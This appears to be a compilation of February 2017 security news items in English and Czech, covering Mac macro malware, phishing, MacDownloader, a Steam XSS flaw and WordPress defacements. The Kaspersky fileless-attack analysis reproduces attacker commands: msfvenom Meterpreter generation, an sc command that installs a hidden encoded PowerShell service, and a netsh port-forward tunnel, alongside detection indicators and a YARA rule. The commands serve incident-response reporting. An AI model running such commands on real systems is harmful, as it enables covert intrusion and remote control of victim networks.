The Fisher function was observed to decode a base64 chunk of data and then execute it via Python. The Python code, which appears to have been copied from the open-source EmPyre project, checks the machine to make sure LittleSnitch is not running, downloads the second-stage payload (from hxxps[:]//www.securitychecking.org:443/index[.]asp), then RC4 decrypts this payload and executes it.
While EmPyre is a known open-source multi-stage post-exploitation agent “built on cryptologically-secure communications,” it’s unknown what the second-stage payload included, as the file wasn’t available during analysis. While it might have been another EmPyre component, this payload could have been something entirely different as well.
“The second-stage component of Empyre is the persistent agent that affords a remote attacker continuing access to an infected host,” the researcher says. For persistence, cronjob, dylib hijack, launch daemon, or login hook are likely used.
“The persistent component of EmPyre can also be configured to run a wide range of EmPyre modules. These modules allow the attacker to perform a myriad of nefarious actions such as enabling the webcam, dumping the keychain, and accessing a user's browser history,” the researcher notes.
The IP associated with the securitychecking(.)org website that hosts the malicious payload appears to be geolocated in Russia and was previously associated with phishing.
While the malware used in this attack isn’t particularly advanced, as it relies on user interaction to open the malicious document in Microsoft Word and enable macros, it also uses an open-source implant that is likely to be easily detected. However, the use of social engineering is noteworthy, especially since it exploits the weakest link in the chain, namely the human element.
“And moreover, since macros are 'legitimate' functionality (vs. say a memory corruption vulnerability), the malware's infection vector doesn't have to worry about crashing the system nor being 'patched' out,” the researcher concludes.
Česká spořitelna varuje: kyberútočníci využívají nový trik s adresou
8.2.2017 Živě.cz Phishing
S phishingem se v posledních týdnech roztrhl pytel. Před útoky na klienty varovala Fio banka, ČSOB, Alza, ale také Google v souvislosti s Gmailem. Nově se přidala i Česká spořitelna, která zaznamenala novou vlnu útoků, v níž útočníci využívají novou metody pro zmatení uživatelů.
Vše opět stojí na e-mailu, který uživatele vyzývá k zobrazení důležité zprávy v internetovém bankovnictví. Po kliknutí na odkaz jej přenese na podvodnou přihlašovací stránku tvářící se jako korektní webová správa účtu. Zadané údaje ale samozřejmě míří do databáze útočníků. Tentokrát se snaží vylákat také autorizační kód doručený formou SMS.
Uživateli nejdřív dojde e-mail, v němž najde odkaz na důležitou zprávu v internetovém bankovnictví • Následně je uživatel přesměrován na podvodnou stránku, která se vydává za internetové bankovnictví (foto: Česká spořitelna)
Novinkou je využití finty, která má zamaskovat adresu falešného webu využitím tzv. Data URI, kdy lze do adresy zapsat kus zdrojového kódu. Díky tomu může adresní řádek obsahovat i známý text servis24.cz, uživatele by však měla varovat především absence zabezpečeného připojení, které je v prohlížečích symbolizováno ikonou zeleného zámku.
Česká spořitelna vyzývá k přeposílání podvodných e-mailů na adresu phishing@csas.cz a zároveň doporučuje ihned kontaktovat zákaznickou linku v případě, že již došlo k zadání údajů do falešného formuláře.
Autor známého doplňku pro Kodi si chtěl vyřizovat účty, a tak do něj umístil DDoS
8.2.2017 Živě.cz Hacking
Scéna okolo populárního přehrávače Kodi v minulých dnech zažila nepříjemnou aféru. Autor jednoho z populárních doplňků Exodus, který slouží ke streamování filmů a seriálů z internetu, si chtěl pomocí obrovské základny uživatelů vyřizovat účty se svými kritiky a do kódu doplňku zakomponoval pokus o DDoS.
Multimediální přehrávač Kodi na Android TV
Podle TorrentFreaku byl autor Exodu, který na internetu vystupoval pod přezdívkou Lambda, ve sporu s jistými kritiky, kteří chtěli odhalit jeho skutečnou identitu. Toho se Lambda jako autor pirátského doplňku obával, a tak v rámci aktualizace umístil do kódu Exodu několik řádů s příkazy, které cyklicky načítaly webové adresy, které patřily jeho nepřátelům.
Kód v Pythonu, který ve smyčce prováděl HTTP GET požadavky. Při velkém počtu uživatelů doplňku autor doufal, že způsobí neplechu a zahltí webový server.
Zvídavým uživatelům však jen tak něco neunikne, a tak se brzy začali ptát, proč se doplněk snaží na pozadí otevřít asi čtyřicet webových spojení pokaždé, když skrze něj začnou cokoliv streamovat.
Lambda se nakonec musel přiznat, že chtěl poškodit své kritiky a funkci upravil jako volitelnou pro své podporovatele. Zašel však příliš daleko, znedůvěryhodnil celou scénu a přišel o účet v katalogu s doplňky. Nakonec Kodi fakticky opustil.
Domácí kino Kodi na Android TV
Celý případ připomněl, že s instalací jakéhokoliv kódu třetí strany musíme vždy myslet na to, že jej může nedůvěryhodný autor zneužít. Nemusí se přitom vždy jednat o malware, který by nám měl citelně ublížit, ale třeba právě o to, že se nás pokusí zapojit do útoku typu DDoS jako v tomto případě.
Sledování internetu vojenským zpravodajstvím: posun správným směrem
8.2.2017 Lupa.cz BigBrother
Poslanci dnes na zasedání výboru pro bezpečnost přidali k novele zákona o Vojenském zpravodajství několik důležitých návrhů mířících pozitivním směrem.
K novele zákona o Vojenském zpravodajství (VOZ) jsem se už párkrát vyjadřoval a není tedy asi nutné připomínat, že nejsem velkým příznivcem této normy. Osobně si myslím, že umělé rozdělení na kybernetickou bezpečnost a kybernetickou obranu a také propojení tohoto tématu se zpravodajskou službou je velmi špatný nápad. Razantně jsem vystupoval i proti tomu, aby VOZ mohla technicky získávat veškerá data internetového provozu. Pojistka v zákonu ve formě prohlášení, že se VOZ obsahem nebude zbývat, mi přišla slabá. Stejně tak mi vadí, že by k diskusi o nasazení příslušné techniky nebyli přizváni odborníci mimo okruh VOZ či ministerstva obrany.
Dnešní zasedání výboru pro bezpečnost přineslo mírně příznivé zprávy. Za prvé, navrhovaný pozměňovací návrh říká, že VOZ bude moci získávat pouze metadata. Přeloženo do obecné češtiny to znamená, že VOZ „uvidí“ pouze hlavičky (obálky) zpráv a nikoliv obsah zpráv. V praxi to znamená, že například uvidí, že si dva mailové servery předávaly nějakou zprávu, ale nebudou vědět od koho komu a co v ní bylo. Budou také případně moci vidět, že z nějaké konkrétní IP adresy kdosi přistupoval na web např. Seznamu, CZ.NICu či třeba na servery s obsahem pro dospělé.
Dále čtěte: Přišlo hacknutí ministerstva zahraničí jako na zavolanou?
Nebudou ale mít 100% jistotu kdo a co tam stahoval. Daná IP adresa může sloužit firmě, nějaké domácnosti, ale bohužel i pouze konkrétnímu jednotlivci. Dále tato změna také znamená, že je vyloučeno nasazení aktivního zařízení, přes které by protékal veškerý provoz, i pasivního zařízení, které by odposlouchávalo veškerou komunikaci nějaké linky. V praxi by to pravděpodobně znamenalo, že by ISP ze svého routeru posílal informace o provozu pomoci NetFlow či sFlow, což je relativně běžná procedura, která se pro monitoring sítě používá. Ale je pravdou, že pro některé ISP s routery bez této funkcionality to může být určitá technická komplikace.
Druhá změna se týká zřízení poradního orgánu, jenž by měl zahrnovat i odborníky z řad operátorů, a který by vydával odborná stanoviska k navrhovanému nasazení techniky. Trochu tomuto ustanovení vyčítám, že není lépe řečeno, kdo přesně bude členem tohoto orgánu. Praxe by to sice vyjasnila, ale byl bych radši, kdyby tam bylo jasně napsáno, že tam budou například i zástupci národního i vládního CERT týmu apod.
Třetí změnou je vydávání každoroční zprávy o učiněných opatřeních. Opět to je pochopitelně dobrý posun. I když je trochu škoda, že navrhovaná úprava je v této věci velmi stručná. Považoval bych za lepší, kdyby zmiňovaná zpráva obsahovala i výčet závažných útoků, jež daná technika pomohla detekovat či eliminovat.
Brand
Každopádně závěr výboru vítám, pořád si sice myslím, že by bylo lepší kybernetickou obranu a bezpečnost této země zajistit jinými mechanismy, ale tento pozměňovací návrh novelu jednoznačně zlepšuje.
Spam je zpět, je ho nejvíc za 7 let, každý desátý obsahuje malware
8.2.2017 Root.cz Spam
Každou sekundu je na světě odesláno 3500 nevyžádaných mailů, každý desátý z nich je škodlivý. Spam dnes představuje více než 65 procent veškeré odeslané pošty a hodnoty se tak dostávají na úroveň roku 2010.
Objem rozesílaného spamu opět roste. Po relativně klidných letech se jeho objem zvýšil několikanásobně. Zatímco během roku 2015 se každou sekundu poslalo průměrně 500 spamů, nyní se jich posílá 3500. Ukazuje to alespoň zpráva Cisco 2017 Annual Cybersecurity Report, která potvrzuje informace týmu Cisco Talos ze září 2016.
Objem spamu opět roste
Podle ní je v současnosti jasně vidět snaha útočníků o co nejvyšší zisk. Taktiky kybernetických útočníků se dnes podobají obchodním modelům s cílem maximalizovat zisk. A využívají nejen nových možností, ale spoléhají se i na staré finty, jako je spam, který dnes představuje 65 % všech odeslaných mailů, píše se ve zprávě. Objemově se tak spam dostává na sedm let staré hodnoty z roku 2010.
Mezi 8 a 10 procenty spamu je navíc přímo infikováno malware, útočníci jej přidávají jako přílohu. Tímto způsobem se pak šíří nejrůznější škodlivý kód, na vzestupu je software zobrazující nevyžádané reklamy.
Nebezpečnější nevyžádané reklamy
Škodlivý software zobrazující nevyžádanou reklamu (tzv. adware) je na vzestupu, navíc nebezpečnější než dříve. Kybernetičtí útočníci totiž začali adware využívat jako první krok k infikování systémů pokročilejším typem malwaru. Jedním z příkladů může být malware DNSChanger, který umožní útočníkovi kontrolovat síťový provoz.
DNSChanger se přitom vyskytuje pouze v zařízeních, která již dříve byla infikována adwarem. Jeho škodlivost je nicméně velmi podceňována a výzkumníci zjistili, že v 75 % organizací se adware vyskytuje minimálně na jednom zařízení. Zkoumáno bylo 130 organizací různých velikostí a napříč obory.
Útočníci také využívají častěji internetovou reklamu, prostřednictvím které šíří škodlivý software (tzv. malvertisting). Malvertising totiž umožňuje útočníkům rychle rozšířit počet potenciálních obětí. Při takto rozsáhlé kampani navíc dokážou rychle přepínat mezi jednotlivými servery, které šíří malware. Tímto způsobem snižují riziko svého odhalení. Například prostřednictvím kampaně ShadowGate proběhl útok na miliony uživatelů po celém světě.
Studie dále zkoumala, jaký dopad mají úspěšné kybernetické útoky na tržby nejenom velkých firem, ale i malých a středních podniků. Téměř čtvrtina organizací (22 %), na které byl veden úspěšný útok, ztratily své zákazníky a 40 % z nich přišlo o více než pětinu své zákaznické základny. Podobně se snížily i jejich tržby. Celých 29 % úspěšně napadených organizací zaznamenalo nižší příjmy, 38% z nich pak ztratilo více než 20 % objemu tržeb. Přestože ztráty způsobené kybernetickými útoky jsou významné, naše studie zjistila, že až 44 % bezpečnostních incidentů zůstává ignorováno a dále nevyšetřeno. Důkladná analýza přestálého útoku je přitom nezbytná, aby organizace mohla vylepšit svá bezpečnostní opatření, říká Milan Habrcetl, bezpečnostní expert společnosti Cisco ČR.
Nejrozšířenější exploit kity ustupují, přicházejí nové
Studie zjistila, že nejrozšířenější nástroje pro šíření škodlivého softwaru (tzv. exploit kity) téměř vymizely. Exploit kity Angler, Nuclear, Neutrino a RIG dříve patřily mezi nejpoužívanější. V listopadu 2016 však byl jediným aktivním RIG.
Ústup exploit kitu Angler souvisí se zatčením 50 ruských hackerů na jaře 2016, kteří využívali malware Lurk k útokům na ruské banky. Výzkumníci společnosti Cisco totiž zjistili úzké propojení mezi malwarem Lurk a exploit kitem Angler.
To však neznamená sníženou aktivitu útočníků. Na jejich místo nastupují jiné formy, například Sundown, Sweet Orange a Magnitude. Stejně jako RIG cílí tyto exploit kity na zranitelnosti v Microsoft Internet Exploreru, Flashi a v aplikační platformě Silverlight.
Spousta různých řešení a cloud
Ze závěrů studie vyplývá, že 55 % organizací používá bezpečnostní řešení více než 5 výrobců, 3 % organizací dokonce uvedly, že mají produkty od více než 50 výrobců. Složitost bezpečnostní architektury však může paradoxně pomoci útočníkům. Ti mají více času a prostoru pro zahájení útoku. Ne všechna řešení jsou totiž kompatibilní a ne všechna zařízení v síti bývají chráněna všemi nainstalovanými bezpečnostními produkty.
Organizacím navíc taková situace stěžuje hledání bezpečnostních odborníků, neboť práce s mnoha nástroji výrazně zvyšuje nároky na kvalifikaci lidí. A právě nedostatek odborníků vnímají bezpečnostní ředitelé jako jedno z hlavních omezení pro vybudování kvalitního zabezpečení, uvádí Milan Habrcetl. Ve výzkumu to potvrdilo 25 % dotázaných. Mezi dalšími omezeními byly zmíněny: limitovaný rozpočet (38 %), potíže s kompatibilitou systémů (28 %) a potřebné certifikace (25 %).
Zároveň se zvyšuje množství nasazovaných cloudových aplikací. Počet cloudových aplikací, které zaměstnanci využívají, se za dva roky více než zdesetinásobil. Bezpečnostní tým Cisco CloudLock zkoumal 900 organizací a jejich zaměstnanci používali v říjnu 2014 celkem 20 400 různých cloudových aplikací, zatímco v říjnu 2016 už zhruba 222 000. Více než čtvrtina z nich (27 %) byla vyhodnocena jako vysoce riskantní. Zajištění ochrany v souvislosti s narůstajícím objemem cloudového provozu tak patří mezi hlavní body zájmu bezpečnostních manažerů.
a href="https://i.iinfo.cz/images/108/spam-objem-1.png"Spousta různých řešení a cloud
Russia Detains Nine 'Hackers' Over $17 Million Bank Thefts
8.2.2017 Securityweek Hacking
Russia has detained nine people alleged to be part of a cybercrime ring accused of stealing some $17 million dollars from bank accounts, the interior ministry said Wednesday.
The detentions followed a nationwide manhunt. The FSB security agency launched a major operation last year against the alleged 50-strong "hacker group" that pilfered more than one billion rubles ($16.8 million, 15.8 million euros) since 2013, the statement said.
"Nine individuals suspected of participating in hacking attacks were detained on January 25," ministry spokeswoman Irina Volk said. One was placed under arrest.
A total of 27 members and organizers are being investigated, with 19 of them now under arrest in pre-trial jail, the ministry said.
Unnamed security sources on Wednesday told Russian agencies that the latest arrests are connected to a case against legendary hacking collective Lurk that was targeted by law enforcement agencies in a sweep last year.
According to cybersecurity giant Kaspersky, the group was reportedly suspected of stealing some three billion rubles from commercial organisations that included banks.
Russian hackers are in the spotlight over their alleged involvement in cyberattacks targeting the US presidential election campaign but experts say the vast majority of cybercrime in the country is financial.
The FSB itself is also currently caught up in another murky scandal that has seen at least two of its top cybersecurity experts arrested for treason linked to the United States, a lawyer involved in the case has said.
That treason case has also seen the arrest of Ruslan Stoyanov -- the head of Kaspersky's cybersecurity unit that probed Lurk.
Sophos to Acquire Invincea for up to $120 Million
8.2.2017 Securityweek Virus
IT security firm Sophos announced on Wednesday that it has agreed to acquire Invincea, a provider of endpoint security solutions that leverage virtual containers to protect against advanced malware and other threats.
Under the terms of the agreement Sophos will pay $100 million in cash to buy the endpoint protection firm, with a possible $20 million earn-out.
Headquartered in Fairfax, Va., Invincea was founded by chief executive officer Anup Ghosh, and has raised more than $50 million in funding.
Invincea’s flagship product X uses “deep learning neural networks and behavioral monitoring” to detect previously unseen malware and stops attacks.
According to Kris Hagerman, chief executive officer at Sophos, Invincea’s technology will strengthen Sophos' recently launched Intercept X product, which includes set of next-generation technologies such as the signature-less anti-malware, anti-exploit and anti-ransomware technology.
“The Invincea machine learning malware detection and prevention technology will be fully integrated into the Sophos endpoint protection portfolio,” Sophos explained. “The availability of Invincea technology through the Sophos Central security management platform will further enhance the Sophos synchronized security portfolio and real-time intelligence sharing.”
"Invincea was created to address sophisticated threats from nation state actors and cyber criminals that were successfully evading traditional network and antivirus solutions," Ghosh wrote in a blog post. "We understood that signature based defenses were nearing the end of their useful life, and alternative non-signature based solutions were needed."
Norm Laudermilch, chief operating officer and head of product development at Invincea added, "Invincea set out to disrupt the traditional approach to antivirus, and even now no single technology is enough to fully protect customers. I share the Sophos vision for bringing together a powerful ensemble of next-gen technologies to dramatically improve the overall effectiveness of endpoint protection. Along with our world-class technical team at Invincea, I'm looking forward to joining Sophos and helping deliver on this ambitious and exciting vision."
Sophos said it would retain Invincea’s office in Fairfax, and Ghosh and COO Norm Laudermilch will join Sophos in key leadership positions.
For Invincea customers, the Invincea endpoint security portfolio will continue to be supported and sold by Invincea and available via Invincea's channel partners.
Invincea Labs, a division of Invincea that invents, prototypes and engineers technologies for government and industry, has been separately managed and operated since 2012, and is not part of this transaction.
Iranian hackers are back with the MACDOWNLOADER MAC malware
8.2.2017 Securityweek Apple
An Iranian espionage group has been using an unsophisticated strain of malware, dubbed MacDownloader, to steal credentials and other data from Mac users.
A cyber espionage group linked to the Iranian Government has been using an unsophisticated strain of malware, dubbed MacDownloader, to steal credentials and other data from Mac computers.
The researchers Claudio Guarnieri and Collin Anderson have analyzed the malicious code that was disguised by nation-state hackers as a Flash Player update and a Bitdefender adware removal tool.
The attacks analyzed by the two researchers were mainly focused on the defense industrial base sector, but it is known that the same threat was used against a human rights advocate.
According to the researchers, the malware was first “poorly” developed the end of 2016, the experts noticed its code was copied from other sources. Anyway, at the time of writing the analysis, MacDownload is undetected by virus scanning engines on VirusTotal, while at the time I was writing just a dozen vendors have recognized the bogus Flash Player and Bitdefender apps as a threat.
Once the MacDownloader infects a device, the malware collects information about the host, including passwords stored in the Keychain.
“MacDownloader seems to be poorly developed and created towards the end of 2016, potentially a first attempt from an amateur developer. In multiple cases, the code used has been copied from elsewhere. The simple activity of downloading the remote file appears to have been sourced from a cheat sheet. The main purpose of MacDownloader seems to be to perform an initial profiling of the infected system and collection of credentials from macOS’s Keychain password manager – which mirrors the focus of Windows malware developed by the same actors.” reads the analysis published by the security duo.
The malicious code was first spotted on a fake website of the aerospace firm United Technologies Corporation, that same site that was used in the past to spread a Windows malware and the Browser Exploitation Framework (BeEF).
The malware researchers linked the MacDownloader with the activity of an Iranian threat actor known as Charming Kitten (aka Newscaster and NewsBeef).
Newscaster group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.
Iranian Hackers used a network of fake accounts (NEWSCASTER network) on principal social media to spy on US officials and political staff worldwide, this is reported in an analysis done by iSIGHT Partners. The Charming Kitten group is also known for the abuse of Open Source Security Tools, including the BeEF.
The analysis of the malware revealed that the authors have attempted to implement remote update and persistence capabilities, but both features don’t work.
“It appears that the application contains an unused attempt to install persistent access to the victim host. One segment provides a poorly-implemented shell script to save a response from the C2 and mark it for persistence by writing an entry in the /etc/rc.common file. In theory, every time the infected computer would start up, the shell script would be launched to download a file from a remote location, check if it changed from the previous iteration, and if so execute that new implant. While we haven’t managed to obtain a proper response from the server before it was taken offline, our initial investigation did not find a subsequent implant.” states the analysis.
The experts have collected evidence that links the malware to other Iranian threat actors, including the Iran Cyber Security Group and Flying Kitten (aka Rocket Kitten).
“Of particular note are wireless networks named Jok3r and mb_1986. Jok3r corresponds with a member of a defacement group, Iran Cyber Security Group, who continues to be fairly active in vandalizing sites. Iran Cyber Security Group also, as with many other defacement groups later identified as involved in state-aligned campaigns, purports to provide commercial security services and penetration testing training.” states the report.
“The “mb_1986″ wireless name is more interesting, as it provides a connection to earlier Iranian campaigns, overlapping with the Flying Kitten actor group and subsequent malware activity in summer 2014.”
The report also includes the IoCs, enjoy it!
Absolute Extends Self-Healing Capabilities to Third-Party Software
8.2.2017 securityweek Security
Vancouver, Canada-based endpoint security company Absolute announced this week the launch of a new product that provides self-healing capabilities to third-party security and management applications.
Absolute’s Persistence technology is embedded in the firmware of over one billion PCs and mobile devices from manufacturers such as Dell, ASUS, HP, Microsoft, Lenovo, Acer, Samsung, Toshiba, Panasonic and Fujitsu. This approach aims to ensure that IT teams are provided uncompromised visibility and real-time remediation capabilities for devices, data and applications.
The company’s Absolute Device & Data Security (DDS) product is designed to allow organizations to monitor endpoints and data stored on computers and cloud storage devices, and quickly address incidents.
Absolute has now announced the availability of Application Persistence, a product that provides self-healing capabilities to third-party endpoint controls, including antiviruses, VPNs, encryption, and management tools.
A recent study has shown that more than half of enterprises have at least six agents installed on their endpoints, and when one of these agents is removed or compromised, the organization can remain exposed to further attacks.
Absolute’s technology aims to address the risk by allowing endpoint agents to repair themselves when removed or compromised by external actors or insider threats, giving enterprises more control over their endpoints, including improved visibility and real-time remediation. Furthermore, it provides IT teams the capabilities needed to ensure that compliance requirements are met.
The company says the self-healing capabilities work even if the machine is not on the corporate network, its firmware is flashed, the hard drive is replaced, or the operating system is reinstalled.
Absolute said its Application Persistence product has already been tested by organizations in the healthcare, financial services and manufacturing industries. The product is available worldwide to enterprises, OEMs, security firms, and independent software vendors (ISVs).
Fileless attacks against enterprise networks
8.2.2017 Kaspersky Virus
During incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memories and hard drives. Unfortunately, each of these storage media has a limited timeframe when the required data is available. One reboot of an attacked computer will make memory acquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of needed data and, depending on its activity, forensic specialists may extract data up to a year after an incident. That’s why attackers are using anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity during data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that. Duqu2 used a special driver for that. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling were implemented by attackers using Windows standard utilities like “SC” and “NETSH“.
Description
This threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC). Kaspersky Lab’s product detection names for such kinds of threat are MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. Kaspersky Lab participated in the forensic analysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry. Additionally it was discovered that the NETSH utility as used for tunnelling traffic from the victim’s host to the attacker´s C2.
We know that the Metasploit framework was used to generate scripts like the following one:
This script allocates memory, resolves WinAPIs and downloads the Meterpreter utility directly to RAM. These kind of scripts may be generated by using the Metasploit Msfvenom utility with the following command line options:
msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd
After the successful generation of a script, the attackers used the SC utility to install a malicious service (that will execute the previous script) on the target host. This can be done, for example, using the following command:
sc \\target_name create ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…” start= manual
The next step after installing the malicious service would be to set up tunnels to access to the infected machine from remote hosts, for example using the following command:
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0
That would result in all network traffic from 10.10.1.11:4444 being forwarded to 10.10.1.12:8080. This technique of setting up proxy tunnels will provide the attackers with the ability to control any PowerShell infected host from remote Internet hosts.
The use of the “SC” and “NETSH” utilities requires administrator privileges both in local and remote host. The use of malicious PowerShell scripts also requires privilege escalation and execution policy changes. In order to achieve this, attackers used credentials from Service accounts with administrative privileges (for example backup, service for remote task scheduler, etc.) grabbed by Mimikatz.
Features
The analysis of memory dumps and Windows registries from affected machines allowed us to restore both Meterpreter and Mimikatz. These tools were used to collect passwords of system administrators and for the remote administration of infected hosts.
In order to get the PowerShell payload used by the attackers from the memory dumps, we used the following BASH commands:
cat mal_powershell.ps1_4 | cut -f12 -d” ” | base64 -di | cut -f8 -d\’ | base64 -di | zcat – | cut -f2 -d\( | cut -f2 -d\” | less | grep \/ | base64 -di | hd
Resulting in the following payload:
Part of a code responsible for downloading Meterpreter from “adobeupdates.sytes[.]net”
Victims
Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry. These are detected as Trojan.Multi.GenAutorunReg.c and HEUR:Trojan.Multi.Powecod.a. The table below show the number of infections per country.
However we cannot confirm that all of them were infected by the same attacker.
Attribution
During our analysis of the affected bank we learned that the attackers had used several third level domains and domains in the .GA, .ML, .CF ccTLDs. The trick of using such domains is that they are free and missing WHOIS information after domain expiration. Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, this makes attribution almost impossible. This closest groups with the same TTPs are GCMAN and Carbanak.
Conclusions
Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry. Unfortunately the use of common tools combined with different tricks makes detection very hard.
In fact, detection of this attack would be possible in RAM, network and registry only. Please check the Appendix I – Indicators of Compromise section for more details on how to detect malicious activity related to this fileless PowerShell attack.
After successful disinfection and cleaning, it is necessary to change all passwords. This attack shows how no malware samples are needed for successful exfiltration of a network and how standard and open source utilities make attribution almost impossible.
Further details of these attacks and their objectives will be presented at the Security Analyst Summit, to be held on St. Maarten from 2 to 6 April, 2017.
More information about this attack is available to customers of Kaspersky APT Intelligence Services. For a subscription inquiry, contact: intelreports (at) kaspersky [dot] com.
Appendix I – Indicators of Compromise
To find the host used by an attacker using the technique described for remote connections and password collection, the following paths in the Windows registry should be analyzed:
HKLM\SYSTEM\ControlSet001\services\ – path will be modified after using the SC utility
HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – path will be modified after using the NETSH utility
In unallocated space in the Windows registry, the following artefacts might be found:
powershell.exe -nop -w hidden -e
10.10.1.12/8080
10.10.1.11/4444
Please note that these IPs are taken from the IR case in which we participated, so there could be any other IP used by an eventual attacker. These artefacts indicate the use of PowerShell scripts as a malicious service and the use of the NETSH utility for building tunnels.
Verdicts:
MEM:Trojan.Win32.Cometer
MEM:Trojan.Win32.Metasploit
Trojan.Multi.GenAutorunReg.c
HEUR:Trojan.Multi.Powecod
Appendix II – Yara Rules
rule msf_or_tunnel_in_registry
{
strings:
$port_number_in_registry = “/4444”
$hidden_powershell_in_registry = “powershell.exe -nop -w hidden” wide
condition:
uint32(0)==0x66676572 and any of them
}
1
2
3
4
5
6
7
8
rule msf_or_tunnel_in_registry
{
strings:
$port_number_in_registry = “/4444”
$hidden_powershell_in_registry = “powershell.exe -nop -w hidden” wide
condition:
uint32(0)==0x66676572 and any of them
}
Iranian Hackers Use Mac Malware to Steal Data
8.2.2017 securityeek Virus
Iranian cyber espionage
A cyber espionage group linked to Iran has been using an unsophisticated piece of malware named MacDownloader to steal credentials and other data from Mac computers.
The malware was analyzed by Claudio Guarnieri and Collin Anderson, researchers specializing in Iranian surveillance and espionage campaigns targeting human rights, foreign policy and civil society entities.
MacDownloader, disguised by attackers as a Flash Player update and a Bitdefender adware removal tool, was created towards the end of 2016. Much of the code has been copied from other sources and experts believe this could be an amateur developer’s first attempt at creating a piece of malware.
When Guarnieri and Anderson conducted their analysis, the malware had not been known to any of the security products on VirusTotal. At the time of writing, nearly a dozen vendors have flagged the fake Flash Player and Bitdefender apps as malicious.
MacDownloader was first spotted on a fake website of aerospace firm United Technologies Corporation, which had previously delivered Windows malware. The same host had also been used to deploy the Browser Exploitation Framework (BeEF) on sites apparently belonging to the U.S. Air Force and a dental office.
While the attacks observed by Guarnieri and Anderson appear to be targeted at the defense industrial base sector, the experts are aware of reports that it has also been used against a human rights advocate.
Evidence suggests that the macOS malware is tied to Charming Kitten, aka Newscaster and NewsBeef, an Iranian threat actor known for creating fake personas on social networking websites in an effort to harvest information from targeted individuals in the US, Israel, the UK, Saudi Arabia and Iraq. Charming Kitten is also known for using BeEF.
Once it infects a device, the malware harvests information about the system, including processes and applications, and collects passwords stored in the Keychain. The Windows malware used by the group is similar, collecting saved credentials and browser history from Chrome and Firefox.
While its code shows that the developers of MacDownloader have attempted to implement remote update and persistence capabilities, these mechanisms don’t appear to be functional.
Researchers have found links between MacDownloader and other threat actors believed to be located in Iran, including the Iran Cyber Security Group, which specializes in defacing websites, and Flying Kitten (aka Rocket Kitten), which is known for targeting organizations in the Middle East and NATO countries.
Valve is going to fix a serious vulnerability in Steam online gaming platform
8.2.2017 securityeek Vulnerebility
The online game platform Steam is fixing a serious bug that could be exploited to redirect users to malicious websites and take over their profile.
The popular online game platform Steam is going to fix a serious vulnerability that could be exploited by hackers to redirect users to malicious websites, use their market funds, and also change their profile.
It seems that the XSS exploit on Steam Profiles has been only partially fixed, it seems that the flaw had been fixed only the initial activity feed pages, but it is still present on subsequent pages.
The attackers can exploit the flaw by inserting JavaScript and other malicious code into their profiles, then the code is executed without any warning on the computers of anyone who visits the booby-trapped page.
The vulnerability was first reported in a Reddit thread this week, and experts observed that in a few hours after its disclosure many people were creating profiles that contained the code to trigger the vulnerability.
According to Ars, most of the exploit pages just redirect visitors to a site with PHP code that prompts them to download an unknown file.
“Such redirections, however, are possibly only a small sample of what the underlying exploit makes possible. One Reddit participant said here and here that viewing malicious profiles could force people to make purchases using their Steam market funds.” reported the Ars.
Clearly, the flaw in the Steam platform could be also exploited to steal authentication cookies used and control the user accounts of the visitors.
It is expected that the number of infected profiles would rapidly grow because it is enough that users visit an existing malicious profile.
Steam
The Steam platform was already exploited by hackers in the past to launch cyber attacks. In October 2016, the malware researcher Lawrence Abrams discovered a Reddit user which is warning of the existence of hacked Steam accounts used to spread a Remote Access Trojan (RAT).
In March 2016, the security expert at Kaspersky Lab, Santiago Pontiroli, and Bart P, an independent security researcher, published an interesting analysis of malware targeting the Steam gaming platform and evolution of threats through the last few years,
Valve estimated that nearly 77,000 accounts are hijacked and pillaged each month.
Back to the present, Steam users who think they may have visited a malicious profile urge to check their settings and should change their passwords. I always suggest also to enable two-factor authentication to avoid ugly surprises.
Thousands of WordPress Sites Hacked Using Recently Disclosed Vulnerability
8.2.2017 thehackernews Hacking
Last week, we reported about a critical zero-day flaw in WordPress that was silently patched by the company before hackers have had their hands on the nasty bug to exploit millions of WordPress websites.
To ensure the security of millions of websites and its users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install the patch, ensuring that the issue was dealt with in short order before it became public.
But even after the company's effort to protect its customers, thousands of admins did not bother to update their websites, which are still vulnerable to the critical bug and has already been exploited by hackers.
While WordPress includes a default feature that automatically updates unpatched websites, some admins running critical services disable this feature for first testing and then applying patches.
Even the news blog of one of the famous Linux distribution OpenSUSE (news.opensuse.org) was also hacked, but restored immediately without breach of any other part of openSUSE's infrastructure, CIO reports.
The vulnerability resided in Wordpress REST API that would lead to the creation of new flaws, allowing an unauthenticated attacker to delete pages or modify all pages on unpatched websites and redirect their visitors to malicious exploits and a large number of attacks.
The security researcher at Sucuri, who privately disclosed the flaw to WordPress, said they started noticing the attacks leveraging this bug less than 48 hours after disclosure. They noticed at least four different campaigns targeting still unpatched websites.
In one such campaign, hackers were successful in replacing the content of over 66,000 web pages with "Hacked by" messages. Rest campaigns have targeted roughly 1000 pages in total.
Besides defacing websites, such attacks appear to be carried out mostly for black hat SEO campaign in order to spread spam and gain ranking in search engine, which is also known as search engine poisoning.
"What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward," explained Daniel Cid, CTO, and founder of Sucuri.
